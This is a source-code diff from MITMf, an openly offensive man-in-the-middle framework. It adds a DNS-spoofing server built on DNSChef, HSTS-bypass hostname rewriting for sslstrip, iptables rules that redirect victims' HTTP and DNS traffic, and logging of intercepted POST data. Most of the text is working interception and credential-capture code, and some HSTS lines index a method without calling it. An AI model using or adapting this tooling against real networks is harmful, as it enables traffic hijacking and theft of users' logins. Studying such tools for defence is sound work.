+ qname = str(d.q.qname) + + # Chop off the last period + if qname[-1] == '.': qname = qname[:-1] + + qtype = QTYPE[d.q.qtype] + + # Find all matching fake DNS records for the query name or get False + fake_records = dict() + + for record in nametodns: + + fake_records[record] = self.findnametodns(qname, nametodns[record]) + + if hsts: + if qname in hstsconfig: + response = self.hstsbypass(hstsconfig[qname], qname, nameservers, d) + return response + + elif qname[:4] == 'wwww': + response = self.hstsbypass(qname[1:], qname, nameservers, d) + return response + + elif qname[:3] == 'web': + response = self.hstsbypass(qname[3:], qname, nameservers, d) + return response + + # Check if there is a fake record for the current request qtype + if qtype in fake_records and fake_records[qtype]: + + fake_record = fake_records[qtype] + + # Create a custom response to the query + response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q) + + dnschef_logger.info("{} cooking the response of type '{}' for {} to {}".format(self.client_address[0], qtype, qname, fake_record)) + + # IPv6 needs additional work before inclusion: + if qtype == "AAAA": + ipv6 = IP(fake_record) + ipv6_bin = ipv6.strBin() + ipv6_hex_tuple = [int(ipv6_bin[i:i+8],2) for i in xrange(0,len(ipv6_bin),8)] + response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](ipv6_hex_tuple))) + + elif qtype == "SOA": + mname,rname,t1,t2,t3,t4,t5 = fake_record.split(" ") + times = tuple([int(t) for t in [t1,t2,t3,t4,t5]]) + + # dnslib doesn't like trailing dots + if mname[-1] == ".": mname = mname[:-1] + if rname[-1] == ".": rname = rname[:-1] + + response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](mname,rname,times))) + + elif qtype == "NAPTR": + order,preference,flags,service,regexp,replacement = fake_record.split(" ") + order = int(order) + preference = int(preference) + + # dnslib doesn't like trailing dots + if replacement[-1] == ".": replacement = replacement[:-1] + + response.add_answer( RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](order,preference,flags,service,regexp,DNSLabel(replacement))) ) + + elif qtype == "SRV": + priority, weight, port, target = fake_record.split(" ") + priority = int(priority) + weight = int(weight) + port = int(port) + if target[-1] == ".": target = target[:-1] + + response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](priority, weight, port, target) )) + + elif qtype == "DNSKEY": + flags, protocol, algorithm, key = fake_record.split(" ") + flags = int(flags) + protocol = int(protocol) + algorithm = int(algorithm) + key = base64.b64decode(("".join(key)).encode('ascii')) + + response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](flags, protocol, algorithm, key) )) + + elif qtype == "RRSIG": + covered, algorithm, labels, orig_ttl, sig_exp, sig_inc, key_tag, name, sig = fake_record.split(" ") + covered = getattr(QTYPE,covered) # NOTE: Covered QTYPE + algorithm = int(algorithm) + labels = int(labels) + orig_ttl = int(orig_ttl) + sig_exp = int(time.mktime(time.strptime(sig_exp +'GMT',"%Y%m%d%H%M%S%Z"))) + sig_inc = int(time.mktime(time.strptime(sig_inc +'GMT',"%Y%m%d%H%M%S%Z"))) + key_tag = int(key_tag) + if name[-1] == '.': name = name[:-1] + sig = base64.b64decode(("".join(sig)).encode('ascii')) + + response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](covered, algorithm, labels,orig_ttl, sig_exp, sig_inc, key_tag, name, sig))) + + else: + # dnslib doesn't like trailing dots + if fake_record[-1] == 
".": fake_record = fake_record[:-1] + response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](fake_record))) + + response = response.pack() + + elif qtype == "*" and not None in fake_records.values(): + dnschef_logger.info("{} cooking the response of type '{}' for {} with {}".format(self.client_address[0], "ANY", qname, "all known fake records.")) + + response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap,qr=1, aa=1, ra=1), q=d.q) + + for qtype,fake_record in fake_records.items(): + if fake_record: + + # NOTE: RDMAP is a dictionary map of qtype strings to handling classses + # IPv6 needs additional work before inclusion: + if qtype == "AAAA": + ipv6 = IP(fake_record) + ipv6_bin = ipv6.strBin() + fake_record = [int(ipv6_bin[i:i+8],2) for i in xrange(0,len(ipv6_bin),8)] + + elif qtype == "SOA": + mname,rname,t1,t2,t3,t4,t5 = fake_record.split(" ") + times = tuple([int(t) for t in [t1,t2,t3,t4,t5]]) + + # dnslib doesn't like trailing dots + if mname[-1] == ".": mname = mname[:-1] + if rname[-1] == ".": rname = rname[:-1] + + response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](mname,rname,times))) + + elif qtype == "NAPTR": + order,preference,flags,service,regexp,replacement = fake_record.split(" ") + order = int(order) + preference = int(preference) + + # dnslib doesn't like trailing dots + if replacement and replacement[-1] == ".": replacement = replacement[:-1] + + response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](order,preference,flags,service,regexp,replacement))) + + elif qtype == "SRV": + priority, weight, port, target = fake_record.split(" ") + priority = int(priority) + weight = int(weight) + port = int(port) + if target[-1] == ".": target = target[:-1] + + response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](priority, weight, port, target) )) + + elif qtype == "DNSKEY": + flags, protocol, algorithm, key = fake_record.split(" ") + flags = int(flags) + protocol = int(protocol) + algorithm = int(algorithm) + key = base64.b64decode(("".join(key)).encode('ascii')) + + response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](flags, protocol, algorithm, key) )) + + elif qtype == "RRSIG": + covered, algorithm, labels, orig_ttl, sig_exp, sig_inc, key_tag, name, sig = fake_record.split(" ") + covered = getattr(QTYPE,covered) # NOTE: Covered QTYPE + algorithm = int(algorithm) + labels = int(labels) + orig_ttl = int(orig_ttl) + sig_exp = int(time.mktime(time.strptime(sig_exp +'GMT',"%Y%m%d%H%M%S%Z"))) + sig_inc = int(time.mktime(time.strptime(sig_inc +'GMT',"%Y%m%d%H%M%S%Z"))) + key_tag = int(key_tag) + if name[-1] == '.': name = name[:-1] + sig = base64.b64decode(("".join(sig)).encode('ascii')) + + response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](covered, algorithm, labels,orig_ttl, sig_exp, sig_inc, key_tag, name, sig) )) + + else: + # dnslib doesn't like trailing dots + if fake_record[-1] == ".": fake_record = fake_record[:-1] + response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](fake_record))) + + response = response.pack() + + # Proxy the request + else: + dnschef_logger.debug("[DNSChef] {} proxying the response of type '{}' for {}".format(self.client_address[0], qtype, qname)) + + nameserver_tuple = random.choice(nameservers).split('#') + response = self.proxyrequest(data, *nameserver_tuple) + + return response + + + # Find appropriate ip address to use for a queried name. 
The function can + def findnametodns(self,qname,nametodns): + + # Make qname case insensitive + qname = qname.lower() + + # Split and reverse qname into components for matching. + qnamelist = qname.split('.') + qnamelist.reverse() + + # HACK: It is important to search the nametodns dictionary before iterating it so that + # global matching ['*.*.*.*.*.*.*.*.*.*'] will match last. Use sorting for that. + for domain,host in sorted(nametodns.iteritems(), key=operator.itemgetter(1)): + + # NOTE: It is assumed that domain name was already lowercased + # when it was loaded through --file, --fakedomains or --truedomains + # don't want to waste time lowercasing domains on every request. + + # Split and reverse domain into components for matching + domain = domain.split('.') + domain.reverse() + + # Compare domains in reverse. + for a,b in map(None,qnamelist,domain): + if a != b and b != "*": + break + else: + # Could be a real IP or False if we are doing reverse matching with 'truedomains' + return host + else: + return False + + # Obtain a response from a real DNS server. + def proxyrequest(self, request, host, port="53", protocol="udp"): + reply = None + try: + if DNSChef.getInstance().ipv6: + + if protocol == "udp": + sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM) + elif protocol == "tcp": + sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM) + + else: + if protocol == "udp": + sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + elif protocol == "tcp": + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + + sock.settimeout(3.0) + + # Send the proxy request to a randomly chosen DNS server + + if protocol == "udp": + sock.sendto(request, (host, int(port))) + reply = sock.recv(1024) + sock.close() + + elif protocol == "tcp": + sock.connect((host, int(port))) + + # Add length for the TCP request + length = binascii.unhexlify("%04x" % len(request)) + sock.sendall(length+request) + + # Strip length from the response + reply = sock.recv(1024) + reply = reply[2:] + + sock.close() + + except Exception, e: + dnschef_logger.warning("could not proxy request: {}".format(e)) + else: + return reply + + def hstsbypass(self, real_domain, fake_domain, nameservers, d): + + dnschef_logger.info("{} resolving '{}' to '{}' for HSTS bypass".format(self.client_address[0], fake_domain, real_domain)) + + response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q) + + nameserver_tuple = random.choice(nameservers).split('#') + + #First proxy the request with the real domain + q = DNSRecord.question(real_domain).pack() + r = self.proxyrequest(q, *nameserver_tuple) + + #Parse the answer + dns_rr = DNSRecord.parse(r).rr + + #Create the DNS response + for res in dns_rr: + if res.get_rname() == real_domain: + res.set_rname(fake_domain) + response.add_answer(res) + else: + response.add_answer(res) + + return response.pack() + +# UDP DNS Handler for incoming requests +class UDPHandler(DNSHandler, SocketServer.BaseRequestHandler): + + def handle(self): + (data,socket) = self.request + response = self.parse(data) + + if response: + socket.sendto(response, self.client_address) + +# TCP DNS Handler for incoming requests +class TCPHandler(DNSHandler, SocketServer.BaseRequestHandler): + + def handle(self): + data = self.request.recv(1024) + + # Remove the addition "length" parameter used in the + # TCP DNS protocol + data = data[2:] + response = self.parse(data) + + if response: + # Calculate and add the additional "length" parameter + # used in TCP DNS protocol + length 
= binascii.unhexlify("%04x" % len(response)) + self.request.sendall(length+response) + +class ThreadedUDPServer(SocketServer.ThreadingMixIn, SocketServer.UDPServer): + + # Override SocketServer.UDPServer to add extra parameters + def __init__(self, server_address, RequestHandlerClass): + self.address_family = socket.AF_INET6 if DNSChef.getInstance().ipv6 else socket.AF_INET + + SocketServer.UDPServer.__init__(self,server_address,RequestHandlerClass) + +class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer): + + # Override default value + allow_reuse_address = True + + # Override SocketServer.TCPServer to add extra parameters + def __init__(self, server_address, RequestHandlerClass): + self.address_family = socket.AF_INET6 if DNSChef.getInstance().ipv6 else socket.AF_INET + + SocketServer.TCPServer.__init__(self,server_address,RequestHandlerClass) + +class DNSChef(ConfigWatcher): + + _instance = None + + tcp = False + ipv6 = False + hsts = False + real_records = dict() + nametodns = dict() + server_address = "0.0.0.0" + nameservers = ["8.8.8.8"] + port = 53 + + @staticmethod + def getInstance(): + if DNSChef._instance == None: + DNSChef._instance = DNSChef() + + return DNSChef._instance + + def onConfigChange(self): + config = self.config['MITMf']['DNS'] + + self.port = int(config['port']) + + # Main storage of domain filters + # NOTE: RDMAP is a dictionary map of qtype strings to handling classe + for qtype in RDMAP.keys(): + self.nametodns[qtype] = dict() + + # Adjust defaults for IPv6 + if config['ipv6'].lower() == 'on': + self.ipv6 = True + if config['nameservers'] == "8.8.8.8": + self.nameservers = "2001:4860:4860::8888" + + # Use alternative DNS servers + if config['nameservers']: + self.nameservers = config['nameservers'].split(',') + + for section in config.sections: + + if section in self.nametodns: + for domain,record in config[section].iteritems(): + + # Make domain case insensitive + domain = domain.lower() + + self.nametodns[section][domain] = record + + for k,v in self.config["SSLstrip+"].iteritems(): + self.real_records[v] = k + + def setHstsBypass(self): + self.hsts = True + + def start(self): + self.onConfigChange() + self.startConfigWatch() + + if self.config['MITMf']['DNS']['tcp'].lower() == 'on': + self.startTCP() + else: + self.startUDP() + + # Initialize and start the DNS Server + def startUDP(self): + server = ThreadedUDPServer((self.server_address, int(self.port)), UDPHandler) + # Start a thread with the server -- that thread will then start + # more threads for each request + server_thread = threading.Thread(target=server.serve_forever) + + # Exit the server thread when the main thread terminates + server_thread.daemon = True + server_thread.start() + + # Initialize and start the DNS Server + def startTCP(self): + server = ThreadedTCPServer((self.server_address, int(self.port)), TCPHandler) + + # Start a thread with the server -- that thread will then start + # more threads for each request + server_thread = threading.Thread(target=server.serve_forever) + + # Exit the server thread when the main thread terminates + server_thread.daemon = True + server_thread.start() diff --git a/core/sslstrip/ClientRequest.py b/core/sslstrip/ClientRequest.py index 11db682..721438b 100644 --- a/core/sslstrip/ClientRequest.py +++ b/core/sslstrip/ClientRequest.py @@ -49,17 +49,15 @@ class ClientRequest(Request): Request.__init__(self, channel, queued) self.reactor = reactor self.urlMonitor = URLMonitor.getInstance() - self.hsts = 
URLMonitor.getInstance().isHstsBypass() + self.hsts = URLMonitor.getInstance().hsts self.cookieCleaner = CookieCleaner.getInstance() self.dnsCache = DnsCache.getInstance() self.plugins = ProxyPlugins.getInstance() #self.uniqueId = random.randint(0, 10000) #Use are own DNS server instead of reactor.resolve() - self.resolver = URLMonitor.getInstance().getResolver() self.customResolver = dns.resolver.Resolver() self.customResolver.nameservers = ['127.0.0.1'] - self.customResolver.port = URLMonitor.getInstance().getResolverPort() def cleanHeaders(self): headers = self.getAllHeaders().copy() @@ -70,7 +68,7 @@ class ClientRequest(Request): if self.hsts: if 'referer' in headers: - real = self.urlMonitor.real + real = self.urlMonitor.getHstsConfig()[0] if len(real) > 0: dregex = re.compile("({})".format("|".join(map(re.escape, real.keys())))) headers['referer'] = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), headers['referer']) @@ -133,7 +131,7 @@ class ClientRequest(Request): if self.hsts: host = self.urlMonitor.URLgetRealHost(str(host)) - real = self.urlMonitor.real + real = self.urlMonitor.getHstsConfig()[0] patchDict = self.urlMonitor.patchDict url = 'http://' + host + path self.uri = url # set URI to absolute @@ -179,7 +177,7 @@ class ClientRequest(Request): self.proxyViaHTTP(address, self.method, path, postData, headers, port) def handleHostResolvedError(self, error): - mitmf_logger.debug("[ClientRequest] Host resolution error: " + str(error)) + mitmf_logger.debug("[ClientRequest] Host resolution error: {}".format(error)) try: self.finish() except: @@ -195,16 +193,20 @@ class ClientRequest(Request): mitmf_logger.debug("[ClientRequest] Host not cached.") - if self.resolver == 'dnschef': + if self.urlMonitor.getResolver() == 'dnschef': + + self.customResolver.port = self.urlMonitor.getResolverPort() + try: mitmf_logger.debug("[ClientRequest] Resolving with DNSChef") address = str(self.customResolver.query(host)[0].address) return defer.succeed(address) except Exception: - mitmf_logger.debug("[ClientRequest] Exception occured, falling back to reactor.resolve()") + mitmf_logger.debug("[ClientRequest] Exception occured, falling back to Twisted") return reactor.resolve(host) - elif self.resolver == 'twisted': + elif self.urlMonitor.getResolver() == 'twisted': + mitmf_logger.debug("[ClientRequest] Resolving with Twisted") return reactor.resolve(host) def process(self): diff --git a/core/sslstrip/SSLServerConnection.py b/core/sslstrip/SSLServerConnection.py index 406d100..f0db397 100644 --- a/core/sslstrip/SSLServerConnection.py +++ b/core/sslstrip/SSLServerConnection.py @@ -40,7 +40,7 @@ class SSLServerConnection(ServerConnection): def __init__(self, command, uri, postData, headers, client): ServerConnection.__init__(self, command, uri, postData, headers, client) self.urlMonitor = URLMonitor.getInstance() - self.hsts = URLMonitor.getInstance().isHstsBypass() + self.hsts = URLMonitor.getInstance().hsts def getLogLevel(self): return logging.INFO @@ -58,7 +58,7 @@ class SSLServerConnection(ServerConnection): if v[:7].lower()==' domain': dominio=v.split("=")[1] mitmf_logger.debug("[SSLServerConnection][HSTS] Parsing cookie domain parameter: %s"%v) - real = self.urlMonitor.sustitucion + real = self.urlMonitor.getHstsConfig()[1] if dominio in real: v=" Domain=%s"%real[dominio] mitmf_logger.debug("[SSLServerConnection][HSTS] New cookie domain parameter: %s"%v) @@ -85,13 +85,13 @@ class SSLServerConnection(ServerConnection): if ((not link.startswith('http')) and (not link.startswith('/'))): 
absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link - mitmf_logger.debug("Found path-relative link in secure transmission: " + link) - mitmf_logger.debug("New Absolute path-relative link: " + absoluteLink) + mitmf_logger.debug("[SSLServerConnection] Found path-relative link in secure transmission: " + link) + mitmf_logger.debug("[SSLServerConnection] New Absolute path-relative link: " + absoluteLink) elif not link.startswith('http'): absoluteLink = "http://"+self.headers['host']+link - mitmf_logger.debug("Found relative link in secure transmission: " + link) - mitmf_logger.debug("New Absolute link: " + absoluteLink) + mitmf_logger.debug("[SSLServerConnection] Found relative link in secure transmission: " + link) + mitmf_logger.debug("[SSLServerConnection] New Absolute link: " + absoluteLink) if not absoluteLink == "": absoluteLink = absoluteLink.replace('&', '&') diff --git a/core/sslstrip/ServerConnection.py b/core/sslstrip/ServerConnection.py index d5acf5f..d048d6e 100644 --- a/core/sslstrip/ServerConnection.py +++ b/core/sslstrip/ServerConnection.py @@ -55,8 +55,8 @@ class ServerConnection(HTTPClient): self.client = client self.clientInfo = None self.urlMonitor = URLMonitor.getInstance() - self.hsts = URLMonitor.getInstance().isHstsBypass() - self.app = URLMonitor.getInstance().isAppCachePoisoning() + self.hsts = URLMonitor.getInstance().hsts + self.app = URLMonitor.getInstance().app self.plugins = ProxyPlugins.getInstance() self.isImageRequest = False self.isCompressed = False @@ -70,7 +70,7 @@ class ServerConnection(HTTPClient): if self.command == 'GET': try: user_agent = parse(self.headers['user-agent']) - self.clientInfo = "{0} [type:{1}-{2} os:{3}] ".format(self.client.getClientIP(), user_agent.browser.family, user_agent.browser.version[0], user_agent.os.family) + self.clientInfo = "{} [type:{}-{} os:{}] ".format(self.client.getClientIP(), user_agent.browser.family, user_agent.browser.version[0], user_agent.os.family) except: self.clientInfo = "{} ".format(self.client.getClientIP()) @@ -93,7 +93,7 @@ class ServerConnection(HTTPClient): elif 'keylog' in self.uri: self.plugins.hook() else: - mitmf_logger.warning("{0} {1} Data ({2}):\n{3}".format(self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], self.postData)) + mitmf_logger.warning("{} {} Data ({}):\n{}".format(self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], self.postData)) self.transport.write(self.postData) def connectionMade(self): @@ -106,7 +106,7 @@ class ServerConnection(HTTPClient): self.sendPostData() def handleStatus(self, version, code, message): - mitmf_logger.debug("[ServerConnection] Server response: {0} {1} {2}".format(version, code, message)) + mitmf_logger.debug("[ServerConnection] Server response: {} {} {}".format(version, code, message)) self.client.setResponseCode(int(code), message) def handleHeader(self, key, value): diff --git a/core/sslstrip/ServerConnectionFactory.py b/core/sslstrip/ServerConnectionFactory.py index 759eaef..a64c800 100644 --- a/core/sslstrip/ServerConnectionFactory.py +++ b/core/sslstrip/ServerConnectionFactory.py @@ -34,12 +34,12 @@ class ServerConnectionFactory(ClientFactory): return self.protocol(self.command, self.uri, self.postData, self.headers, self.client) def clientConnectionFailed(self, connector, reason): - mitmf_logger.debug("Server connection failed.") + mitmf_logger.debug("[ServerConnectionFactory] Server connection failed.") destination = connector.getDestination() if (destination.port != 443): - 
mitmf_logger.debug("Retrying via SSL") + mitmf_logger.debug("[ServerConnectionFactory] Retrying via SSL") self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443) else: try: diff --git a/core/sslstrip/URLMonitor.py b/core/sslstrip/URLMonitor.py index 56e7de3..4d632f1 100644 --- a/core/sslstrip/URLMonitor.py +++ b/core/sslstrip/URLMonitor.py @@ -18,6 +18,7 @@ import re, os import logging +from core.ConfigWatcher import ConfigWatcher mitmf_logger = logging.getLogger('mimtf') @@ -31,8 +32,6 @@ class URLMonitor: # Start the arms race, and end up here... javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")] _instance = None - sustitucion = {} # LEO: diccionario host / sustitucion - real = {} # LEO: diccionario host / real patchDict = { 'https:\/\/fbstatic-a.akamaihd.net':'http:\/\/webfbstatic-a.akamaihd.net', 'https:\/\/www.facebook.com':'http:\/\/social.facebook.com', @@ -46,9 +45,6 @@ class URLMonitor: self.faviconReplacement = False self.hsts = False self.app = False - self.hsts_config = None - self.resolver = 'dnschef' - self.resolverport = 53 @staticmethod def getInstance(): @@ -57,21 +53,13 @@ class URLMonitor: return URLMonitor._instance - #This is here because I'm lazy - def setResolver(self, resolver): - self.resolver = str(resolver).lower() - #This is here because I'm lazy def getResolver(self): - return self.resolver - - #This is here because I'm lazy - def setResolverPort(self, port): - self.resolverport = int(port) + return ConfigWatcher.getInstance().getConfig()['MITMf']['DNS']['resolver'].lower() #This is here because I'm lazy def getResolverPort(self): - return self.resolverport + return int(ConfigWatcher.getInstance().getConfig()['MITMf']['DNS']['port']) def isSecureLink(self, client, url): for expression in URLMonitor.javascriptTrickery: @@ -92,7 +80,7 @@ class URLMonitor: s.add(to_url) return url_set = set([from_url, to_url]) - mitmf_logger.debug("[URLMonitor][AppCachePoison] Set redirection: %s" % url_set) + mitmf_logger.debug("[URLMonitor][AppCachePoison] Set redirection: {}".format(url_set)) self.redirects.append(url_set) def getRedirectionSet(self, url): @@ -123,15 +111,15 @@ class URLMonitor: port = 443 if self.hsts: - if not self.sustitucion.has_key(host): + if not self.getHstsConfig[1].has_key(host): lhost = host[:4] if lhost=="www.": - self.sustitucion[host] = "w"+host - self.real["w"+host] = host + self.getHstsConfig[1][host] = "w"+host + self.getHstsConfig[0]["w"+host] = host else: - self.sustitucion[host] = "web"+host - self.real["web"+host] = host - mitmf_logger.debug("[URLMonitor][HSTS] SSL host (%s) tokenized (%s)" % (host,self.sustitucion[host]) ) + self.getHstsConfig[1][host] = "web"+host + self.getHstsConfig[0]["web"+host] = host + mitmf_logger.debug("[URLMonitor][HSTS] SSL host ({}) tokenized ({})".format(host, self.getHstsConfig[1][host])) url = 'http://' + host + path #mitmf_logger.debug("HSTS stripped URL: %s %s"%(client, url)) @@ -139,7 +127,7 @@ class URLMonitor: self.strippedURLs.add((client, url)) self.strippedURLPorts[(client, url)] = int(port) - return 'http://'+ self.sustitucion[host] + path + return 'http://'+ self.getHstsConfig[1][host] + path else: url = method + host + path @@ -150,40 +138,35 @@ class URLMonitor: def setFaviconSpoofing(self, faviconSpoofing): self.faviconSpoofing = faviconSpoofing - def setHstsBypass(self, hstsconfig): - self.hsts = True - self.hsts_config = hstsconfig + def getHstsConfig(self): + sustitucion = dict() + real = dict() - for 
k,v in self.hsts_config.iteritems(): - self.sustitucion[k] = v - self.real[v] = k + for k,v in ConfigWatcher.getInstance().getConfig()['SSLstrip+']: + sustitucion[k] = v + real[v] = k + + return (real, sustitucion) + + def setHstsBypass(self): + self.hsts = True def setAppCachePoisoning(self): self.app = True - def setClientLogging(self, clientLogging): - self.clientLogging = clientLogging - def isFaviconSpoofing(self): return self.faviconSpoofing - def isClientLogging(self): - return self.clientLogging - - def isHstsBypass(self): - return self.hsts - - def isAppCachePoisoning(self): - return self.app - def isSecureFavicon(self, client, url): return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1)) def URLgetRealHost(self, host): - mitmf_logger.debug("[URLMonitor][HSTS] Parsing host: %s"% host) - if self.real.has_key(host): - mitmf_logger.debug("[URLMonitor][HSTS] Found host in list: %s"% self.real[host]) - return self.real[host] + mitmf_logger.debug("[URLMonitor][HSTS] Parsing host: {}".format(host)) + + if self.getHstsConfig()[0].has_key(host): + mitmf_logger.debug("[URLMonitor][HSTS] Found host in list: {}".format(self.getHstsConfig()[0][host])) + return self.getHstsConfig()[0][host] + else: - mitmf_logger.debug("[URLMonitor][HSTS] Host not in list: %s"% host) + mitmf_logger.debug("[URLMonitor][HSTS] Host not in list: {}".format(host)) return host diff --git a/core/utils.py b/core/utils.py index 233f959..4d83911 100644 --- a/core/utils.py +++ b/core/utils.py @@ -20,58 +20,71 @@ # import os -import random -import linecache import sys +import random +import logging -def PrintException(): - exc_type, exc_obj, tb = sys.exc_info() - f = tb.tb_frame - lineno = tb.tb_lineno - filename = f.f_code.co_filename - linecache.checkcache(filename) - line = linecache.getline(filename, lineno, f.f_globals) - return '({}, LINE {} "{}"): {}'.format(filename, lineno, line.strip(), exc_obj) +logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy +from scapy.all import get_if_addr, get_if_hwaddr class SystemConfig: - @staticmethod - def setIpForwarding(value): - with open('/proc/sys/net/ipv4/ip_forward', 'w') as file: - file.write(str(value)) - file.close() + @staticmethod + def setIpForwarding(value): + with open('/proc/sys/net/ipv4/ip_forward', 'w') as file: + file.write(str(value)) + file.close() + + @staticmethod + def getIP(interface): + try: + ip_address = get_if_addr(interface) + if (ip_address == "0.0.0.0") or (ip_address is None): + sys.exit("[-] Interface {} does not have an assigned IP address".format(interface)) + + return ip_address + except Exception, e: + sys.exit("[-] Error retrieving IP address from {}: {}".format(interface, e)) + + @staticmethod + def getMAC(interface): + try: + mac_address = get_if_hwaddr(interface) + return mac_address + except Exception, e: + sys.exit("[-] Error retrieving MAC address from {}: {}".format(interface, e)) class IpTables: - _instance = None + _instance = None - def __init__(self): - self.dns = False - self.http = False + def __init__(self): + self.dns = False + self.http = False - @staticmethod - def getInstance(): - if IpTables._instance == None: - IpTables._instance = IpTables() + @staticmethod + def getInstance(): + if IpTables._instance == None: + IpTables._instance = IpTables() - return IpTables._instance + return IpTables._instance - def Flush(self): - os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X') - self.dns = False - self.http = False 
+ def Flush(self): + os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X') + self.dns = False + self.http = False - def HTTP(self, http_redir_port): - os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port %s' % http_redir_port) - self.http = True + def HTTP(self, http_redir_port): + os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port {}'.format(http_redir_port)) + self.http = True - def DNS(self, ip, port): - os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to %s:%s' % (ip, port)) - self.dns = True + def DNS(self, ip, port): + os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to {}:{}'.format(ip, port)) + self.dns = True class Banners: - banner1 = """ + banner1 = """ __ __ ___ .--. __ __ ___ | |/ `.' `. |__| | |/ `.' `. _.._ | .-. .-. '.--. .| | .-. .-. ' .' .._| @@ -85,7 +98,7 @@ class Banners: `'-' |_| """ - banner2= """ + banner2= """ ███▄ ▄███▓ ██▓▄▄▄█████▓ ███▄ ▄███▓ █████▒ ▓██▒▀█▀ ██▒▓██▒▓ ██▒ ▓▒▓██▒▀█▀ ██▒▓██ ▒ ▓██ ▓██░▒██▒▒ ▓██░ ▒░▓██ ▓██░▒████ ░ @@ -97,7 +110,7 @@ class Banners: ░ ░ ░ """ - banner3 = """ + banner3 = """ ▄▄▄▄███▄▄▄▄ ▄█ ███ ▄▄▄▄███▄▄▄▄ ▄████████ ▄██▀▀▀███▀▀▀██▄ ███ ▀█████████▄ ▄██▀▀▀███▀▀▀██▄ ███ ███ ███ ███ ███ ███▌ ▀███▀▀██ ███ ███ ███ ███ █▀ @@ -108,7 +121,7 @@ class Banners: ▀█ ███ █▀ █▀ ▄████▀ ▀█ ███ █▀ ███ """ - banner4 = """ + banner4 = """ ___ ___ ___ /\ \ /\ \ /\__\ |::\ \ ___ ___ |::\ \ /:/ _/_ @@ -121,7 +134,16 @@ class Banners: \:\__\ /:/ / \:\__\ \:\__\ \:\__\ \/__/ \/__/ \/__/ \/__/ \/__/ """ - - def printBanner(self): - banners = [self.banner1, self.banner2, self.banner3, self.banner4] - print random.choice(banners) \ No newline at end of file + + banner5 = """ +███╗ ███╗██╗████████╗███╗ ███╗███████╗ +████╗ ████║██║╚══██╔══╝████╗ ████║██╔════╝ +██╔████╔██║██║ ██║ ██╔████╔██║█████╗ +██║╚██╔╝██║██║ ██║ ██║╚██╔╝██║██╔══╝ +██║ ╚═╝ ██║██║ ██║ ██║ ╚═╝ ██║██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝╚═╝ +""" + + def printBanner(self): + banners = [self.banner1, self.banner2, self.banner3, self.banner4, self.banner5] + print random.choice(banners) \ No newline at end of file diff --git a/libs/dnschef b/libs/dnschef deleted file mode 160000 index d24a8c2..0000000 --- a/libs/dnschef +++ /dev/null @@ -1 +0,0 @@ -Subproject commit d24a8c2237eaae372e60a47f175694e8afa07c32 diff --git a/mitmf.py b/mitmf.py index 74e469a..97bedfe 100755 --- a/mitmf.py +++ b/mitmf.py @@ -28,21 +28,16 @@ from twisted.internet import reactor from core.sslstrip.CookieCleaner import CookieCleaner from core.sergioproxy.ProxyPlugins import ProxyPlugins from core.utils import Banners -from core.utils import PrintException -from configobj import ConfigObj - -logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy -from scapy.all import get_if_addr, get_if_hwaddr +from core.configwatcher import ConfigWatcher from plugins import * -plugin_classes = plugin.Plugin.__subclasses__() try: import user_agents except ImportError: print "[-] user_agents library missing! User-Agent parsing will be disabled!" 
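
As a usage sketch only (it is not part of this patch), the snippet below shows how a plugin is expected to consume the new dynamic-config API: it subclasses ConfigWatcher from core/configwatcher.py, reads the parsed config/mitmf.conf through self.config, and overrides onConfigChange() to pick up edits made while MITMf is running. The class name ExamplePlugin and the interface string are made up for illustration; ConfigWatcher, SystemConfig and the ['MITMf']['DNS'] config keys it relies on are the ones introduced or kept by this patch, and the sketch assumes it is run from the MITMf checkout with watchdog, configobj and scapy installed.

#!/usr/bin/env python2.7
# Illustrative sketch of the dynamic config support added in this patch.
# "ExamplePlugin" and the interface name are hypothetical.

from core.configwatcher import ConfigWatcher
from core.utils import SystemConfig

class ExamplePlugin(ConfigWatcher):

    def initialize(self, interface):
        # one-off values resolved through the new core.utils helpers
        self.ip_address = SystemConfig.getIP(interface)

        # values that must track the live config are (re)read in onConfigChange()
        self.onConfigChange()

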